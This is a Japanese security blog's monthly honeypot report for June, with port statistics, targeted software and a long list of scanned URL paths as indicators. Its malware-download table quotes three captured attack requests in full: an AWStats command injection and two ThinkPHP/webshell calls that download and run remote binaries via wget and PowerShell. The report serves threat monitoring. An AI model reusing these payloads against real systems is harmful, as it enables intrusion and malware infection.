【ハニーポット月次分析】Honeypot 6月度〜VNC宛て通信増加中〜
Honeypot 月次分析6月度となります。来月からはsuricataも導入しているので来月はそちらの分析も出来ればと思っています。
【ハニーポット月次分析】Honeypot 6月度
◾️Honeytrap(80ポートは除く)
<検知数>
6/9の検知数が多いですが、これはポート14791宛にRDP向けの通信が多数発生したことが原因となっいます。
ペイロード:
Cookie: mstshash=Test
突発的に増加する大半はRDPへの通信であり、外部からアクセスできた場合、攻撃者側のリターンが大きくため、定期的に検知しているのではないかと推測しています。
<ポート別検知数_前月差(Honeytrap)>
ポート番号 | サービス | 件数 | 件数差(前月) |
---|---|---|---|
5900 | vnc | 149714 | 128430 |
445 | smb | 106044 | -903 |
23 | telnet | 42814 | -4681 |
110 | pop3 | 29107 | 28940 |
3389 | rdp | 8278 | -28026 |
3306 | mysql | 6438 | 430 |
10630 | 6218 | 6215 | |
25 | smtp | 3783 | -1410 |
5432 | 3300 | -21480 | |
2323 | telnet | 2447 | -1128 |
<ポート別検知数_90日平均差(Honeytrap)>
ポート番号 | サービス | 件数 | 件数差(90日平均) |
---|---|---|---|
5900 | vnc | 149714 | 109398 |
445 | smb | 106044 | 633 |
23 | telnet | 42814 | -8308 |
110 | pop3 | 29107 | 27848 |
14791 | Unknown | 15851 | 15841 |
3389 | rdp | 8278 | -6869 |
3306 | mysql | 6438 | -3071 |
10630 | Unknown | 6218 | 6215 |
25 | smtp | 3783 | 1182 |
5432 | Unknown | 3300 | -5132 |
vncおよびpop3宛てのポートへの通信が増加していました。どちらの通信も特に通信内容はなくポートが空いているかどうか調査しているものでした。vncについてはBluekeepでリモートアクセスに関する脆弱性によって検知数が増えたのかもしれません。
また、他のサービスがUnknownであるものはRDPへの不正アクセスを狙ったものでした。
<マルウェアダウンロード 対象別集計>
対象 | 検知数 |
Realtek SDK | 713 |
webshell | 87 |
MVPower DVR | 73 |
Huawei Home Device | 71 |
Redis | 59 |
Android Debug Bridge | 53 |
Weblogic | 29 |
Linksys ルータ | 18 |
Apache Struts2 | 12 |
Elasticsearch | 4 |
ZyXEL社ルータ | 3 |
AVTECH | 1 |
Realtek SDK を対象とした MiraiおよびGafgytのダウンロード狙ったものを多く検知していました。また、webshellやradisの検知もそこそこ検知いました。
◾️WoWHoneypot
<検知数>
<ターゲット別検知数 TOP10>
target | count |
---|---|
Tomcat | 7362 |
WordPress | 2138 |
- | 848 |
FreePBX | 732 |
IP camera | 284 |
phpMyAdmin | 167 |
Unauthorized Relay | 137 |
Zabbix | 42 |
ThinkPHP | 15 |
.env file | 14 |
Tomcatのコンソールへの不正アクセスを狙ったものが継続して多く検知していました。一方でIP cameraを狙った攻撃などもあり、徐々にIoTを狙った攻撃も増加傾向にあると思われます。
<検知パス TOP10>
wow_path_research | target | CVE | reference | count |
---|---|---|---|---|
/manager/html | Tomcat | - | - | 7362 |
/wp-login.php | WordPress | - | - | 956 |
/ | - | - | - | 795 |
/admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 | 732 |
/tmpfs/auto.jpg | IP camera | - | - | 284 |
/xmlrpc.php | WordPress | - | - | 136 |
/wp5/wp-login.php | WordPress | - | - | 95 |
/wp2/wp-login.php | WordPress | - | - | 93 |
/forum/wp-login.php | WordPress | - | - | 90 |
/wp/wp-login.php | WordPress | - | - | 90 |
HTTPパスではTomcatマネージャへの不正アクセスが他のパスと比べて頭一つ多く検知していました。他はFreePBX、Wordpressを狙った攻撃を多く検知していました。
<マルウェアダウンロード>
MalwareDownload | path | payload | count |
---|---|---|---|
hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT[.]x86 | /awstatstotals/awstatstotals.php | GET /awstatstotals/awstatstotals.php?sort=].passthru('echo%20YYY;cd%20/tmp;%20wget%20hxxp://xxx.xxx.xxx.xxx/ECHO/ECHOBOT.x86;%20chmod%20777%20ECHOBOT.x86;%20./ECHOBOT.x86;%20rm%20-rf%20ECHOBOT.x86;%20history%20-c;echo%20YYY;').exit().%24a[ HTTP/1.1..sort=].phpinfo().exit().$a[.User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1).Connection: Close.. | 1 |
hxxp://fid[.]hognoob[.]se/download[.]exe | /public/hydra.php | GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start%20%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe HTTP/1.1.Connection: Keep-Alive.Accept: */*.Accept-Language: zh-cn.Referer: hxxp://xxx.xxx.xxx.xxx:80/public/hydra.php?xcmd=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start %SystemRoot%/Temp/yorungtvlzcwfwq13178.exe.User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1).Host: xxx.xxx.xxx.xxx.. | 1 |
hxxp://fid[.]hognoob[.]se/download[.]exe | /public/index.php | GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid[.]hognoob[.]se/download[.]exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start%20%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe HTTP/1.1.Connection: Keep-Alive.Accept: */*.Accept-Language: zh-cn.Referer: hxxp://xxx.xxx.xxx.xxx:80/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1]=cmd.exe /c powershell (new-object System.Net.WebClient).DownloadFile('hxxp://fid.hognoob.se/download.exe','%SystemRoot%/Temp/yorungtvlzcwfwq13178.exe');start %SystemRoot%/Temp/yorungtvlzcwfwq13178.exe.User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1).Host: xxx.xxx.xxx.xxx.. | 1 |
hydra.phpやindex.phpは他の攻撃によって設置されたWebshellであり、Webshellが設置されていた場合、マルウェアがダウンロードされるものとなります。拡張子がexeファイルであることからターゲットOSはwindowsを狙ったものとなります。
https://www.alibabacloud.com/blog/threat-alert-multiple-cryptocurrency-miner-botnets-start-to-exploit-the-new-thinkphp-vulnerability_594369
https://sec-owl.hatenablog.com/entry/2019/01/17/014528
<IoC情報>
WoWHoneypot
path | target | CVE | reference |
/ | - | - | - |
/admin/assets/js/views/login.js | FreePBX | - | https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 |
/siteblog/wp-login.php | WordPress | - | - |
/myblog/wp-login.php | WordPress | - | - |
/forum1/wp-login.php | WordPress | - | - |
/WordPress9/wp-login.php | WordPress | - | - |
/WordPress8/wp-login.php | WordPress | - | - |
/WordPress7/wp-login.php | WordPress | - | - |
/WordPress6/wp-login.php | WordPress | - | - |
/WordPress4/wp-login.php | WordPress | - | - |
/WordPress3/wp-login.php | WordPress | - | - |
/WordPress2/wp-login.php | WordPress | - | - |
/WordPress1/wp-login.php | WordPress | - | - |
/wp8/wp-login.php | WordPress | - | - |
/wp7/wp-login.php | WordPress | - | - |
/wp5/wp-login.php | WordPress | - | - |
/wp4/wp-login.php | WordPress | - | - |
/wp3/wp-login.php | WordPress | - | - |
/test/wp-login.php | WordPress | - | - |
/wp1/wp-login.php | WordPress | - | - |
/site/wp-login.php | WordPress | - | - |
/blog/wp-login.php | WordPress | - | - |
/forum/wp-login.php | WordPress | - | - |
/WordPress/wp-login.php | WordPress | - | - |
/wp/wp-login.php | WordPress | - | - |
/wp-login.php | WordPress | - | - |
/favicon.ico | - | - | - |
/wp2/wp-login.php | WordPress | - | - |
hxxp://110[.]249[.]212[.]46/testget | Unauthorized Relay | - | - |
/TP/public/index.php | ThinkPHP | - | - |
/robots.txt | - | - | - |
///wp-json/wp/v2/users/ | WordPress | - | - |
/// | - | - | - |
/Temporary_Listen_Addresses/WSMAN | Microsoft SharePoint | CVE-2019-0604 | https://www.alienvault.com/blogs/labs-research/sharepoint-vulnerability-exploited-in-the-wild |
hxxp://172[.]247[.]32[.]25/ddd[.]html | Unauthorized Relay | - | - |
/PMA/scripts/setup.php | phpMyAdmin | - | - |
/~riba/pma/scripts/setup.php | phpMyAdmin | - | - |
/alt/sqladmin/scripts/setup.php | phpMyAdmin | - | - |
/phpMyAdmin-2.8.0.4/scripts/setup.php | phpMyAdmin | - | - |
/pyaniste/mysqladmin/scripts/setup.php | phpMyAdmin | - | - |
/admincooptel/phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - |
/phpmyadmin.box25/scripts/setup.php | phpMyAdmin | - | - |
/phpmy/scripts/setup.php\ | phpMyAdmin | - | - |
/phpMyAdmin-www072510/scripts/setup.php | phpMyAdmin | - | - |
/phpmy/scripts/setup.php | phpMyAdmin | - | - |
/phpmyadmin/scripts/setup.php/index.php | phpMyAdmin | - | - |
/php/phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - |
/admin/scripts/setup.php | phpMyAdmin | - | - |
/php/scripts/setup.php | phpMyAdmin | - | - |
/php-my-admin/scripts/setup.php | phpMyAdmin | - | - |
/phpMyAdmin2/scripts/setup.php | phpMyAdmin | - | - |
/sqladmin/scripts/setup.php | phpMyAdmin | - | - |
/db/scripts/setup.php | phpMyAdmin | - | - |
/websql/scripts/setup.php | phpMyAdmin | - | - |
/admin/phpmyadmin/scripts/setup.php | phpMyAdmin | - | - |
/_phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - |
/configuracion/phpmyadmin/scripts/setup.php | phpMyAdmin | - | - |
/web/phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - |
/pHpMyAdMiN/scripts/setup.php | phpMyAdmin | - | - |
/MySQL/scripts/setup.php | phpMyAdmin | - | - |
/mysqladmin/scripts/setup.php | phpMyAdmin | - | - |
/scripts/setup.php | phpMyAdmin | - | - |
/MyAdmin/scripts/setup.php | phpMyAdmin | - | - |
/w00tw00t.at.blackhats.romanian.anti-sec:) | phpMyAdmin | - | - |
/epgrec/do-record.sh | epgrec | - | http://www.mda.or.jp/epgrec/index.php/epgrec%E3%81%AE%E3%82%A4%E3%83%B3%E3%82%B9%E3%83%88%E3%83%BC%E3%83%AB%E3%81%A8%E8%A8%AD%E5%AE%9A |
/foltia/ | foltia ANIME LOCKER | - | https://sec-owl.hatenablog.com/entry/2018/08/01/004310 |
/_async/AsyncResponseService | Oracle WebLogic Server | CVE-2019-2725 | https://www.secure-sketch.com/blog/verify-oracle-weblogic-vulnerability |
/.git/config | git | - | - |
/siteblog//wp-json/wp/v2/users/ | WordPress | - | - |
/siteblog// | WordPress | - | - |
/myblog//wp-json/wp/v2/users/ | WordPress | - | - |
/myblog// | WordPress | - | - |
/forum1//wp-json/wp/v2/users/ | WordPress | - | - |
/forum1// | WordPress | - | - |
/WordPress9//wp-json/wp/v2/users/ | WordPress | - | - |
/WordPress9// | WordPress | - | - |
/WordPress8//wp-json/wp/v2/users/ | WordPress | - | - |
/WordPress8// | WordPress | - | - |
/WordPress7//wp-json/wp/v2/users/ | WordPress | - | - |
/WordPress7// | WordPress | - | - |
/WordPress6//wp-json/wp/v2/users/ | WordPress | - | - |
/WordPress6// | WordPress | - | - |
/WordPress5//wp-json/wp/v2/users/ | WordPress | - | - |
/WordPress5// | WordPress | - | - |
/WordPress5/wp-login.php | WordPress | - | - |
/WordPress4//wp-json/wp/v2/users/ | WordPress | - | - |
/WordPress4// | WordPress | - | - |
/WordPress3//wp-json/wp/v2/users/ | WordPress | - | - |
/WordPress3// | WordPress | - | - |
/WordPress2//wp-json/wp/v2/users/ | WordPress | - | - |
/WordPress2// | WordPress | - | - |
/WordPress1//wp-json/wp/v2/users/ | WordPress | - | - |
/WordPress1// | WordPress | - | - |
/wp8//wp-json/wp/v2/users/ | WordPress | - | - |
/wp8// | WordPress | - | - |
/wp7//wp-json/wp/v2/users/ | WordPress | - | - |
/wp7// | WordPress | - | - |
/wp5//wp-json/wp/v2/users/ | WordPress | - | - |
/wp5// | WordPress | - | - |
/wp4//wp-json/wp/v2/users/ | WordPress | - | - |
/wp4// | WordPress | - | - |
/wp3//wp-json/wp/v2/users/ | WordPress | - | - |
/wp3// | WordPress | - | - |
/wp2//wp-json/wp/v2/users/ | WordPress | - | - |
/wp2// | WordPress | - | - |
/downloader/ | - | - | - |
/wp1//wp-json/wp/v2/users/ | WordPress | - | - |
/wp1// | WordPress | - | - |
/site//wp-json/wp/v2/users/ | WordPress | - | - |
/site// | WordPress | - | - |
/test//wp-json/wp/v2/users/ | WordPress | - | - |
/test// | WordPress | - | - |
/blog//wp-json/wp/v2/users | WordPress | - | - |
/blog//wp-json/wp/v2/users/ | WordPress | - | - |
/blog// | WordPress | - | - |
/forum//wp-json/wp/v2/users/ | WordPress | - | - |
/forum// | WordPress | - | - |
/WordPress//wp-json/wp/v2/users/ | WordPress | - | - |
/WordPress// | WordPress | - | - |
/wp//wp-json/wp/v2/users/ | WordPress | - | - |
/wp// | WordPress | - | - |
hxxp://112[.]124[.]42[.]80:63435/ | Unauthorized Relay | - | - |
/Temporary_Listen_Addresses/SMSSERVICE | Microsoft SharePoint | CVE-2019-0604 | https://www.alienvault.com/blogs/labs-research/sharepoint-vulnerability-exploited-in-the-wild |
/manager/html | Tomcat | - | - |
/app/.env | .env file | - | - |
/phpmyadmin/index.php | phpMyAdmin | - | - |
/index.php | - | - | - |
/HNAP1 | D-Link DIR-850L | CVE-2015-2051 | https://www.morihi-soc.net/?p=981 |
/evox/about | Trane Tracer SC | - | https://mogu2itachi.hatenablog.com/entry/2019/03/10/173327 |
/Nmap/folder/check1558950064 | Nmap | - | - |
/NmapUpperCheck1558950064 | Nmap | - | - |
/sdk | Vmware | - | https://github.com/nmap/nmap/blob/master/scripts/vmware-version.nse |
/nmaplowercheck1558950064 | Nmap | - | - |
/Nmap/folder/check1558937902 | Nmap | - | - |
/NmapUpperCheck1558937902 | Nmap | - | - |
/nmaplowercheck1558937902 | Nmap | - | - |
/_search | Elasticsearch | CVE-2015-1427 | https://www.morihi-soc.net/?p=442 |
/autodiscover | Zimbra | - | https://www.exploit-db.com/exploits/46967 |
/HNAP1/ | D-Link DIR-850L | CVE-2015-2051 | https://www.morihi-soc.net/?p=981 |
/.git/HEAD | git | - | - |
/ipc$ | IPC | - | https://thinline196.hatenablog.com/entry/2018/09/23/153019 |
/webdav/ | WebDAV | - | - |
hxxp://www[.]baidu[.]com/ | Unauthorized Relay | - | - |
www.baidu.com:443 | Unauthorized Relay | - | - |
hxxp://www[.]123cha[.]com/ | Unauthorized Relay | - | - |
cn.bing.com:443 | Unauthorized Relay | - | - |
hxxp://www[.]ip[.]cn/ | Unauthorized Relay | - | - |
hxxp://123[.]125[.]114[.]144/ | Unauthorized Relay | - | - |
/tmpfs/auto.jpg | IP camera | - | - |
/admin/config.php | Admin config | - | - |
hxxp://112[.]35[.]53[.]83:8088/index[.]php | Unauthorized Relay | - | - |
hxxp://5[.]188[.]210[.]101/echo[.]php | Unauthorized Relay | - | - |
/queryUserList | Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} | - | https://github.com/mcw0/PoC/blob/master/TVT-PoC.py |
/web/cgi-bin/hi3510/param.cgi | Zivif Web | CVE-2017-17106 | https://sec-owl.hatenablog.com/entry/2018/09/24/011848 |
/system.ini | Microsoft Windows 3.1 System | - | https://www.weblio.jp/content/system.ini |
/device.rsp | TBK Vision DVR | CVE-2018-9995 | https://windabaft.co.jp/blog_ceo/?p=458 |
/System/configurationFile/ | Hikvision IP camera | - | https://mogu2itachi.hatenablog.com/entry/2019/04/07/065650 |
/RPC2_Login | dahua camera | - | https://gist.github.com/avelardi/1338d9d7be0344ab7f4280618930cd0d |
/\cgi-bin/login.cgi | CGI | - | - |
/\cgi-bin/get_status.cgi | /\cgi-bin/get_status.cgi | - | - |
/scripts/setup.php/index.php | phpMyAdmin | - | - |
/PHPMYADMIN/scripts/setup.ph | phpMyAdmin | - | - |
/phpMyAdmin/setup.php/index.php | phpMyAdmin | - | - |
/phpmyadmin/setup.php | phpMyAdmin | - | - |
/.env | .env file | - | - |
//blog/ | WordPress | - | - |
/acadmin.php | Webshell | - | - |
/current_config/passwd | dahua camera | - | https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py |
/cgi-bin/user/Config.cgi | AVTECH AVN801 DVR | CVE-2013-4981 | https://jvndb.jvn.jp/ja/contents/2013/JVNDB-2013-006100.html |
/device_description.xml | UPnP | - | https://medium.com/@djboris/digging-into-upnp-by-searching-a-sonos-api-5e10e080a232 |
/login.html | login Page | - | - |
/winbox.png | MikroTik | - | https://sec-owl.hatenablog.com/entry/2018/10/12/160525 |
/currentsetting.htm | NETGEAR Genie | - | https://qiita.com/comefigo/items/e9b1bce93c1b615e5934 |
/qnfxcjqr | Webshell | - | - |
/fdsrwe | Webshell | - | - |
/images/logo.gif | - | - | - |
/home.asp | ASP | - | - |
/tmpfs/snap.jpg | IP camera | - | https://www.ispyconnect.com/man.aspx?n=IPCMontor |
/phpmyadmin/ | phpMyAdmin | - | - |
/sitemap.xml | xml sitemap | - | - |
/login.cgi | login Page | - | - |
/.well-known/security.txt | SSL certificate | - | https://qiita.com/comefigo/items/e9b1bce93c1b615e5934 |
/mysql/admin/index.php | phpMyAdmin | - | - |
/redirect.php | PHP | - | - |
//about.php | PHP | - | - |
//admin/config.php | Admin config | - | - |
//recordings/ | FreePBX | - | https://cute-0tter.hatenablog.com/entry/2019/02/25/235730 |
//a2billing/customer/templates/default/footer.tpl | FreePBX | - | https://cute-0tter.hatenablog.com/entry/2019/02/25/235730 |
//vtigercrm/vtigerservice.php | vtiger vtiger CRM 5.2.1 | - | https://www.securityfocus.com/bid/47267/info |
hxxp://160[.]16[.]145[.]183/ | Unauthorized Relay | - | - |
/wp-admin/ | WordPress | - | - |
/admin.php | WordPress | - | https://nskw-style.com/2014/diary/visualize-wp-admin-flow.html |
/ccvv | Unknown | - | - |
/index.do | Apache Struts2 | CVE-2017-5638 | https://www.morihi-soc.net/?p=654 |
/index.action | Apache Struts2 | CVE-2017-5638 | https://github.com/mazen160/struts-pwn |
/struts2-rest-showcase/orders.xhtml | Apache Struts2 | CVE-2017-5638 | https://blue-blue.hatenablog.com/entry/2017/03/12/212730 |
/server-status | Apache Server | - | https://github.com/mazen160/server-status_PWN |
/developer/.env | .env file | - | - |
/public/.env | .env file | - | - |
/backup/.env | .env file | - | - |
/portal/.env | .env file | - | - |
/api/.env | .env file | - | - |
/mobile/.env | .env file | - | - |
/dev/.env | .env file | - | - |
/m/.env | .env file | - | - |
/admin/.env | .env file | - | - |
/web/.env | .env file | - | - |
/phpmyadmin | phpMyAdmin | - | - |
/qzone/ | - | - | - |
xui.ptlogin2.qq.com:443 | Unauthorized Relay | - | - |
/console/login/LoginForm.jsp | Oracle WebLogic Server | CVE-2015-4852 | https://www.exploit-db.com/exploits/46628 |
hxxp://check[.]proxyradar[.]com/azenv[.]php | Unauthorized Relay | - | - |
/usr/share/phpmyadmin/libraries/select_lang.lib.php | phpMyAdmin | - | - |
/phpMyAdmin/scripts/db___.init.php | phpMyAdmin | - | - |
/phpMyAdmin-2.11.1-all-languages/scripts/setup.php | phpMyAdmin | - | - |
/sqladm/scripts/setup.php | phpMyAdmin | - | - |
/setup.php | PHP | - | - |
/pma2012/ | phpMyAdmin | - | - |
/pma2011/ | phpMyAdmin | - | - |
/phpadmin/scripts/setup.php | phpMyAdmin | - | - |
/phpMyAdmin-2.5.5/scripts/setup.php | phpMyAdmin | - | - |
/dbadmin/scripts/setup.php | phpMyAdmin | - | - |
/jmx-console/ | Jboss | CVE-2010-0738 | https://www.rapid7.com/db/modules/exploit/multi/http/jboss_maindeployer |
* | - | - | - |
/shop/wp-includes/wlwmanifest.xml | WordPress | - | - |
/wp-includes/wlwmanifest.xml | WordPress | - | - |
/website/wp-includes/wlwmanifest.xml | WordPress | - | - |
/cms/wp-includes/wlwmanifest.xml | WordPress | - | - |
/wp/wp-includes/wlwmanifest.xml | WordPress | - | - |
/site/wp-includes/wlwmanifest.xml | WordPress | - | - |
/dev/wp-includes/wlwmanifest.xml | WordPress | - | - |
/wwww/wp-includes/wlwmanifest.xml | WordPress | - | - |
/web/wp-includes/wlwmanifest.xml | WordPress | - | - |
/WordPress/wp-includes/wlwmanifest.xml | WordPress | - | - |
/blog/wp-includes/wlwmanifest.xml | WordPress | - | - |
/2017/wp-login.php | WordPress | - | - |
/1/wp-login.php | WordPress | - | - |
/myforum/wp-login.php | WordPress | - | - |
/teststite/wp-login.php | WordPress | - | - |
/vlog/wp-login.php | WordPress | - | - |
/shop/wp-login.php | WordPress | - | - |
/nx8j78af1b.jsp | Webshell | - | - |
/blog2/wp-login.php | WordPress | - | - |
/upload/bank-icons/bank_16.png | Unknown | - | - |
/upload/bank-icons/bank-gh.jpg | Unknown | - | - |
hxxp://api[.]ipify[.]org/ | Unauthorized Relay | - | - |
hxxp://112[.]35[.]88[.]28:8088/index[.]php | Unauthorized Relay | - | - |
/3/wp-login.php | WordPress | - | - |
/backup/ | - | - | - |
/dbadmin/ | phpMyAdmin | - | - |
/myadmin/ | phpMyAdmin | - | - |
/pma/ | phpMyAdmin | - | - |
/admin/ | - | - | - |
/db/ | - | - | - |
/mysite/wp-login.php | WordPress | - | - |
/2/wp-login.php | WordPress | - | - |
/2018/wp-login.php | WordPress | - | - |
/news/wp-login.php | WordPress | - | - |
/blog3/wp-login.php | WordPress | - | - |
/2019/wp-login.php | WordPress | - | - |
/index_main.php | Unknown | - | - |
/warning.html | Unknown | - | - |
/xmlrpc.php | WordPress | - | - |
/user/login.html | Unknown | - | - |
hxxp://185[.]172[.]110[.]221:80/proxy_get[.]php | Unauthorized Relay | - | - |
/public/hydra.php | Webshell | - | https://sec-owl.hatenablog.com/entry/2019/01/17/014528 |
/public/index.php | - | - | - |
/login | - | - | - |
/backup | - | - | - |
hxxp://112[.]35[.]66[.]7:8088/index[.]php | Unauthorized Relay | - | - |
hxxp://185[.]172[.]110[.]221/check[.]php | Unauthorized Relay | - | - |
/main.php | - | - | - |
/api_jsonrpc.php | Zabbix | - | - |
/zabbix/api_jsonrpc.php | Zabbix | - | https://www.exploit-db.com/exploits/39937 |
//proxies.php | Zabbix | - | - |
/zabbix//proxies.php | Zabbix | - | - |
/zabbix/jsrpc.php | Zabbix | - | - |
/jsrpc.php | Zabbix | - | - |
/zabbix//httpmon.php | Zabbix | - | - |
//httpmon.php | Zabbix | - | - |
hxxp://112[.]35[.]63[.]31:8088/index[.]php | Unauthorized Relay | - | - |
/forum1/xmlrpc.php | WordPress | - | - |
/wp8/xmlrpc.php | WordPress | - | - |
/WordPress8/xmlrpc.php | WordPress | - | - |
/siteblog/xmlrpc.php | WordPress | - | - |
/myblog/xmlrpc.php | WordPress | - | - |
/WordPress9/xmlrpc.php | WordPress | - | - |
/WordPress3/xmlrpc.php | WordPress | - | - |
/WordPress6/xmlrpc.php | WordPress | - | - |
/wp7/xmlrpc.php | WordPress | - | - |
/WordPress1/xmlrpc.php | WordPress | - | - |
/wp5/xmlrpc.php | WordPress | - | - |
/test/xmlrpc.php | WordPress | - | - |
/wp4/xmlrpc.php | WordPress | - | - |
/wp3/xmlrpc.php | WordPress | - | - |
/wp1/xmlrpc.php | WordPress | - | - |
/site/xmlrpc.php | WordPress | - | - |
/wp2/xmlrpc.php | WordPress | - | - |
/forum/xmlrpc.php | WordPress | - | - |
/wp/xmlrpc.php | WordPress | - | - |
/WordPress/xmlrpc.php | WordPress | - | - |
/WordPress7/xmlrpc.php | WordPress | - | - |
/WordPress4/xmlrpc.php | WordPress | - | - |
/WordPress2/xmlrpc.php | WordPress | - | - |
/blog/xmlrpc.php | WordPress | - | - |
/moo | Unknown | - | - |
/html/.env | .env file | - | - |
/Nmap/folder/check1560131930 | Nmap | - | - |
/NmapUpperCheck1560131930 | Nmap | - | - |
/nmaplowercheck1560131930 | Nmap | - | - |
/shell | Webshell | - | - |
//MyAdmin/scripts/setup.php | phpMyAdmin | - | - |
//phpMyAdmin/scripts/setup.php | phpMyAdmin | - | - |
//pma/scripts/setup.php | phpMyAdmin | - | - |
/CFIDE/administrator/ | Adobe ColdFusion | - | https://www.exploit-db.com/exploits/14641 |
/muieblackcat | Scanner | - | https://eromang.zataz.com/2011/08/14/suc027-muieblackcat-setup-php-web-scanner-robot/ |
/smartdomuspad/modules/reporting/track_import_export.php | U.motion Builder | CVE-2018-7841 | https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day/ |
/images/favicon.ico | - | - | - |
/scripts/ajaxPortal.lua | VMware NSX SD-WAN Edge by VeloCloud | CVE-2018-6961 | https://www.exploit-db.com/exploits/44959 |
185.172.110.221:80 | Unauthorized Relay | - | - |
/awstatstotals/awstatstotals.php | AWStats Totals | CVE-2008-3922 | https://www.bugsearch.net/en/11876/awstats-totals-v114-multisort-remote-command-execution-cve-2008-3922.html |
/laravel/.env | .env file | - | - |
/.bitcoin/.env | .env file | - | - |
hxxp://10010[.]ah165[.]net:8088/hsp/out_of_service[.]jsp | Unauthorized Relay | - | - |
/index.html | - | - | - |
/Login.htm | - | - | - |
/PMA2005/ | phpMyAdmin | - | - |
/SQLite/main.php | SQLiteManager | - | - |
/SQLiteManager-1.2.4/main.php | SQLiteManager | - | - |
/SQLiteManager/main.php | SQLiteManager | - | - |
/agSearch/SQlite/main.php | SQLiteManager | - | - |
/hudson/script | Unknown | - | - |
/mysql-admin/ | phpMyAdmin | - | - |
/mysql/ | phpMyAdmin | - | - |
/mysqladmin/ | phpMyAdmin | - | - |
/mysqlmanager/ | phpMyAdmin | - | - |
/nagiosxi/images/loginsplash.png | phpMyAdmin | - | - |
/openserver/phpmyadmin/ | phpMyAdmin | - | - |
/p/m/a/ | phpMyAdmin | - | - |
/php-my-admin/ | phpMyAdmin | - | - |
/php-myadmin/ | phpMyAdmin | - | - |
/phpMyAdmin-2.2.3/ | phpMyAdmin | - | - |
/phpMyAdmin-2.2.6/ | phpMyAdmin | - | - |
/phpMyAdmin-2.5.1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.5.4/ | phpMyAdmin | - | - |
/phpMyAdmin-2.5.5-pl1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.5.5-rc1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.5.5-rc2/ | phpMyAdmin | - | - |
/phpMyAdmin-2.5.5/ | phpMyAdmin | - | - |
/phpMyAdmin-2.5.6-rc1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.5.6-rc2/ | phpMyAdmin | - | - |
/phpMyAdmin-2.5.6/ | phpMyAdmin | - | - |
/phpMyAdmin-2.5.7-pl1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.5.7/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.0-alpha/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.0-alpha2/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.0-beta1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.0-beta2/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.0-pl1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.0-pl2/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.0-pl3/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.0-rc1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.0-rc2/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.0-rc3/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.0/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.1-pl1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.1-pl2/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.1-pl3/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.1-rc1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.1-rc2/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.2-beta1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.2-pl1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.2-rc1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.2/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.3-pl1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.3-rc1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.3/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.4-pl1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.4-pl2/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.4-pl3/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.4-pl4/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.4-rc1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.6.4/ | phpMyAdmin | - | - |
/phpMyAdmin-2.7.0-beta1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.7.0-pl1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.7.0-pl2/ | phpMyAdmin | - | - |
/phpMyAdmin-2.7.0-rc1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.7.0/ | phpMyAdmin | - | - |
/phpMyAdmin-2.8.0-beta1/ | phpMyAdmin | - | - |
/phpMyAdmin-2.8.0-rc1/ | phpMyAdmin | - | - |
